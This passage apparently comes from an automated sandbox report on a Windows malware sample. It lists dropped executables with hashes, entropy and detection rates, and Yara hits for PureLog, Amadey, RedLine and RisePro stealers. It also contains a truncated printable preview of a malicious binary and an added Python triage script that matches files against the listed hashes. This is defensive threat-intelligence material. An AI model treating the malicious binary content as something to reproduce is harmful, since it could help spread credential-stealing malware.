SHA1:5EBDDE7F87637493DE0A5E7A4FFCD59839672C4E
SHA-256:C3014A898F63FAB694A759D56BB0B3C979484EEDD32708E1467E566B4F3DFA70
SHA-512:680CA9D6F5AA4D53E7083858BFD4D3FC71F567993968EDC83DDF262E15B2ED06F07C5A4C47E65F4874074213ADF3CD978B8EAA658563694CAF013FB126948697
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Reputation:unknown
Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......P.....................\....../.............@..........................P......3-......................................t........0..................................................................................l............................text.............................. ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc........0......................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.c...P....Y.nj'.S....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.f...Y.r8..j...t.A...t$..D....V....s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.d.....3.9F.Y~.9F
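The per-file fields above (MD5/SHA1/SHA-256/SHA-512, 8-bit entropy, the Encrypted flag and the libmagic-style File Type string) are what an analyst reproduces offline when triaging a dropped file pulled from a host against this report's IOCs. The following Python is an added example, not Joe Sandbox code: the PE header parsing follows the documented PE/COFF layout (COFF header, optional-header magic, Subsystem at offset 68, CLR runtime header in data directory 14), the 7.98 entropy threshold for Encrypted is an assumption chosen to sit between the 7.9769 (false) and 7.9906 (true) values on this page, and the sample images built by `build_minimal_pe` are constructed header-only stubs, not the dropped files listed here.

```python
import hashlib
import math
import struct

# SHA-256 values of the dropped files in this report section (copied from the page).
KNOWN_SHA256 = {
    "83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7",  # cred64[1].dll
    "FF477A862BD6E5ACEBE92887A6F221418DA1995DFB0ABED8527E21FDA9B8950B",
    "E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C",
    "3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B",  # alexxxxxxxx[1].exe
    "5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F",  # clip64[1].dll
    "C3014A898F63FAB694A759D56BB0B3C979484EEDD32708E1467E566B4F3DFA70",
}

IMAGE_FILE_DLL = 0x2000                      # IMAGE_FILE_HEADER.Characteristics flag
MACHINE = {0x14C: "Intel 80386", 0x8664: "x86-64"}
SUBSYSTEM = {2: "GUI", 3: "console"}
ENCRYPTED_ENTROPY = 7.98                     # assumed threshold for the report's Encrypted flag


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def describe_pe(data: bytes) -> str:
    """Classify a PE image in the report's File Type wording from its headers alone."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptHdr, Characteristics
    machine, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32plus = magic == 0x20B
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]      # same offset in PE32 and PE32+
    dd_off = opt + (112 if pe32plus else 96)                      # first data directory entry
    n_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]        # NumberOfRvaAndSizes
    dotnet = False
    if n_dirs > 14:                                               # 14 = IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        clr_rva, clr_size = struct.unpack_from("<II", data, dd_off + 14 * 8)
        dotnet = clr_rva != 0 and clr_size != 0
    parts = ["PE32+" if pe32plus else "PE32", "executable"]
    if chars & IMAGE_FILE_DLL:
        parts.append("(DLL)")
    parts.append("(%s)" % SUBSYSTEM.get(subsystem, "subsystem %d" % subsystem))
    parts.append(MACHINE.get(machine, "machine 0x%x" % machine))
    desc = " ".join(parts)
    if dotnet:
        desc += " Mono/.Net assembly"
    return desc + ", for MS Windows"


def profile_dropped_file(data: bytes, known=frozenset(KNOWN_SHA256)) -> dict:
    """Rebuild the report's per-file fields and flag a hash match against known IOCs."""
    sha256 = hashlib.sha256(data).hexdigest().upper()
    ent = shannon_entropy(data)
    try:
        file_type = describe_pe(data)
    except (ValueError, struct.error):
        file_type = "data"
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": sha256,
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "entropy": ent,
        "encrypted": ent >= ENCRYPTED_ENTROPY,
        "file_type": file_type,
        "known_malicious": sha256 in known,
    }


def build_minimal_pe(machine: int, dll: bool, subsystem: int, pe32plus: bool, dotnet: bool) -> bytes:
    """Constructed header-only PE stub for testing the classifier (not a real dropped file)."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)              # EXECUTABLE_IMAGE (+ DLL)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    dd_off = 112 if pe32plus else 96
    struct.pack_into("<I", opt, dd_off - 4, 16)                   # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, dd_off + 14 * 8, 0x2008, 72)  # non-zero CLR header entry
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for key, value in profile_dropped_file(fh.read()).items():
                print("%s: %s" % (key, value))
```

Run it as `python triage.py <file>` on a sample recovered from `%LOCALAPPDATA%\Temp\4d0ab15804\` or the INetCache paths named in the Yara hits; a `known_malicious` of True is a hash match against the six files listed above, while `file_type` and `encrypted` let you compare a repacked or tampered sample against the report even when the hash differs.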
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1166336
                                                                                                                                                                                                                                        Entropy (8bit):7.035559017923821
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8au+2+b+HdiJUX:mTvC/MTQYxsWR7au+2+b+HoJU
                                                                                                                                                                                                                                        MD5:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        SHA1:05DF05F574BC9122886743ED7BEB8887F2439237
                                                                                                                                                                                                                                        SHA-256:FB20F4C38C1F0D0D02422214FBB45DEED82E18F8B239A4383B50512431C56536
                                                                                                                                                                                                                                        SHA-512:E167682092AC7E9CCD5B75CF969E69178D90FA3778567DD7BB9A4AB998A71AA1A360BF55A52A0ED814E31260B9F21EFCE1C3F811908B26F29C8ED9C3D31C4BBD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1166336
                                                                                                                                                                                                                                        Entropy (8bit):7.035559017923821
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8au+2+b+HdiJUX:mTvC/MTQYxsWR7au+2+b+HoJU
                                                                                                                                                                                                                                        MD5:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        SHA1:05DF05F574BC9122886743ED7BEB8887F2439237
                                                                                                                                                                                                                                        SHA-256:FB20F4C38C1F0D0D02422214FBB45DEED82E18F8B239A4383B50512431C56536
                                                                                                                                                                                                                                        SHA-512:E167682092AC7E9CCD5B75CF969E69178D90FA3778567DD7BB9A4AB998A71AA1A360BF55A52A0ED814E31260B9F21EFCE1C3F811908B26F29C8ED9C3D31C4BBD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1954304
                                                                                                                                                                                                                                        Entropy (8bit):7.949125787105512
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
                                                                                                                                                                                                                                        MD5:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
                                                                                                                                                                                                                                        SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
                                                                                                                                                                                                                                        SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):329352
                                                                                                                                                                                                                                        Entropy (8bit):7.976897467568528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:DFZcMaQk5oqtag00+wX3bSJxuI2Hc8PlsLNuPhRF1Ym:DFZg5Ztj00+03mJxmc8PfPwm
                                                                                                                                                                                                                                        MD5:1C7D0F34BB1D85B5D2C01367CC8F62EF
                                                                                                                                                                                                                                        SHA1:33AEDADB5361F1646CFFD68791D72BA5F1424114
                                                                                                                                                                                                                                        SHA-256:E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C
                                                                                                                                                                                                                                        SHA-512:53BF85D2B004F69BBBF7B6DC78E5F021ABA71B6F814101C55D3BF76E6D058A973BC58270B6B621B2100C6E02D382F568D1E96024464E8EA81E6DB8CCD948679D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1793536
Entropy (8bit):7.937675203377117
Encrypted:false
SSDEEP:49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
MD5:85A15F080B09ACACE350AB30460C8996
SHA1:3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
SHA-256:3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
SHA-512:ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
Malicious:true
Yara Hits:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 96%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):471152
Entropy (8bit):7.708138361823541
Encrypted:false
SSDEEP:12288:dxFiggCdJqiuBD2wxLdCGZeJqld72RJ7/SB0UkUmpG:588Iiu8eLYm0qld6kBRRqG
MD5:B22521FB370921BB5D69BF8DEECCE59E
SHA1:3D4486B206E8AAAC14A3CF201C5AC152A2A7D4EA
SHA-256:B30D10E292F89F4D288839974F71F6B703D6D9A9AE698EA172A2B64364E77158
SHA-512:1F7D64BA5266314ED18F577F0984706C21F4F48E8CDB069130E4435C2BCDF219F8DD27E4D3BF3A373F4DB4C01E30EFE8D7F4D87F4D8CBBBEAF9C7043F685994C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 67%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):428544
Entropy (8bit):6.494348537450964
Encrypted:false
SSDEEP:12288:5noAx+FnmuQhimtPURimLqevmipum+K4Y:5+FnmuGtpMLnLYY
MD5:0099A99F5FFB3C3AE78AF0084136FAB3
SHA1:0205A065728A9EC1133E8A372B1E3864DF776E8C
SHA-256:919AE827FF59FCBE3DBAEA9E62855A4D27690818189F696CFB5916A88C823226
SHA-512:5AC4F3265C7DD7D172284FB28C94F8FC6428C27853E70989F4EC4208F9897BE91720E8EEE1906D8E843AB05798F3279A12492A32E8A118F5621AC5E1BE2031B6
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 76%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):311296
Entropy (8bit):5.0817932970004
Encrypted:false
SSDEEP:3072:uq6EgY6i4rUjhYMLwPcologL/ejZWTACtAti0lcZqf7D34leqiOLibBOp:VqY6inwPDpKZWTA+AplcZqf7DIvL
MD5:8510BCF5BC264C70180ABE78298E4D5B
SHA1:2C3A2A85D129B0D750ED146D1D4E4D6274623E28
SHA-256:096220045877E456EDFEA1ADCD5BF1EFD332665EF073C6D1E9474C84CA5433F6
SHA-512:5FF0A47F9E14E22FC76D41910B2986605376605913173D8AD83D29D85EB79B679459E2723A6AD17BC3C3B8C9B359E2BE7348EE1C21FA2E8CEB7CC9220515258D
Malicious:true
Yara Hits:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 92%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):162304
Entropy (8bit):7.967195699444992
Encrypted:false
SSDEEP:3072:I1lmOH349skOxH49PsH+8KqnuHV7A/5S+c6wABA47PN/6wHFHJ:I1iekOxYlI+EuH2cvAe4BywlH
MD5:586F7FECACD49ADAB650FAE36E2DB994
SHA1:35D9FB512A8161CE867812633F0A43B042F9A5E6
SHA-256:CF88D499C83DA613AD5CCD8805822901BDC3A12EB9B15804AEFF8C53DC05FC4E
SHA-512:A44A2C99D18509681505CF70A251BAF2558030A8648D9C621ACC72FAFCB2F744E3EF664DFD0229BAF7C78FB72E69F5D644C755DED4060DCAFA7F711D70E94772
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 92%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):871224
Entropy (8bit):7.24103546516255
Encrypted:false
SSDEEP:12288:EA+sYjJA6W7c5f6ydp1xlxrekNp6MARWch8kDSX+/Pw9Glg3z/F1EIJQWwChTc55:EAwOc5zTderJ/Pe0g3PaWvdc5Fqe
MD5:021B6C96FE692E2BB8D4B0D02E9133B0
SHA1:4FF05288024AEF4F289C22E4E6985F82C29E49D5
SHA-256:FF477A862BD6E5ACEBE92887A6F221418DA1995DFB0ABED8527E21FDA9B8950B
SHA-512:AFC29E105225F8F92C74B8EAD1DF10BEDBF6C795CAD72C53A6CE6237B71D3F73E346CD6E0116C6A380F7D07E79FA5007E63DF8DFE414D0C7816AAF5828CEA482
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 30%
Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2470704
                                                                                                                                                                                                                                        Entropy (8bit):7.990554749886877
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:zgwRtL9Hckjh40JEvPXJnxNH0IHK61VW/2t+YKpEv6o2sUX7fEgvr:zgwRB98kj3JCPF71HKAV3+YAEaZ7fEgj
                                                                                                                                                                                                                                        MD5:55F780EA4DC5A5401B80915D69A55481
                                                                                                                                                                                                                                        SHA1:5EBDDE7F87637493DE0A5E7A4FFCD59839672C4E
                                                                                                                                                                                                                                        SHA-256:C3014A898F63FAB694A759D56BB0B3C979484EEDD32708E1467E566B4F3DFA70
                                                                                                                                                                                                                                        SHA-512:680CA9D6F5AA4D53E7083858BFD4D3FC71F567993968EDC83DDF262E15B2ED06F07C5A4C47E65F4874074213ADF3CD978B8EAA658563694CAF013FB126948697
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1954304
                                                                                                                                                                                                                                        Entropy (8bit):7.949125787105512
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
                                                                                                                                                                                                                                        MD5:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
                                                                                                                                                                                                                                        SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
                                                                                                                                                                                                                                        SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1910784
                                                                                                                                                                                                                                        Entropy (8bit):7.944555942207053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:13/bnTrRlJqN+zVjKQVO3LNjmd6P0uqVs:1jnTrrJqY5ORjSieG
                                                                                                                                                                                                                                        MD5:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        SHA1:15D928181A3ABE9FC84D21454246676BAAD444A8
                                                                                                                                                                                                                                        SHA-256:F2F647BA7CA2104C8D5AA7130502EB7A48CE1AE629EE33ABF1EFCC07F172C449
                                                                                                                                                                                                                                        SHA-512:42630F7E98502C97806A4F241598DBA61298D1874BFFC7BAF1BEA34C3950861A182DAF6798F4834B4D2865238569379A3BFA796DEE953224FC29E712831170C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):2940
                                                                                                                                                                                                                                        Entropy (8bit):7.74899741479457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:9oaHlnPtLeRIT757mXpkjQODXEWjuZ/4BSqSg6qC5ve8RQn3KJ6gkOOyI8wCw:PhKY7mXMl1LBBSgvgve8RQ3KJFSP
                                                                                                                                                                                                                                        MD5:9B4A41DB9CFEF2A60F503064512BBC64
                                                                                                                                                                                                                                        SHA1:0FA674C776BC8DF35071B455F3AE1027FEA44DCB
                                                                                                                                                                                                                                        SHA-256:658138116083EDBE5D426C5A239FA78897AFF59A5B41EA8CA191C06EEDF5359B
                                                                                                                                                                                                                                        SHA-512:D04A82620D9AF9FA5774FD7FB046C567713FFB1888B5B3C0EF8619E094967F62351288D1C82208FF68E67283108B518659129244C66D6AFC504532DBB2ABB30D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.701704028955216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                                                                                                                                                                        MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                                                                                                                                                                        SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                                                                                                                                                                        SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                                                                                                                                                                        SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.690299109915258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                                                                                                                                                                                                        MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                                                                                                                                                                                                        SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                                                                                                                                                                                                        SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                                                                                                                                                                                                        SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                        MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                        SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                        SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
